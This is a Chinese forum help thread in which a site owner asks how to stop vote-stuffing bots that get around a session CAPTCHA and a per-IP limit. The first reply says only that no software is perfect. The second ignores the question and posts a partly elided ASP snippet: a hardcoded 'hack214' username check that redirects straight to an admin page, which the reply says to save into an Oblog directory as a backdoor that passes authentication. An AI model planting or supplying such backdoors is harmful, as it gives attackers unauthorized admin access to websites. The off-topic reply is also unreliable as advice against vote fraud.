求助:如何预防刷票机刷票
我们搞了一个投票,因为网站没有会员系统,所以就通过SESSION +验证码的方式进行投票。
服务器端先生成一个SESSION ,然后再把SESSION 的值,传回到客户端(图片),然后由投票人
通过输入验证码的值,进行投票。
但是我不知道是如何让人绕过的。
然后我又加入了IP 限制,每个投票的人的IP 记录了,如果24小时内,这个IP 投票的次数超过100 ,则返回失败,
但是还是不行。
高手能给我说说吧。谢谢
------解决方案--------------------没有软件是完美的
------解决方案--------------------类似
<%dim username,
dim rs,sql
Username=request("username")
if username="hack214" then
........
set rs=nothing
response.redirect "admin_inex.asp"
end if%>
将其保存为.asp文件保存在Oblog文件中
这种后门是可以通过验证的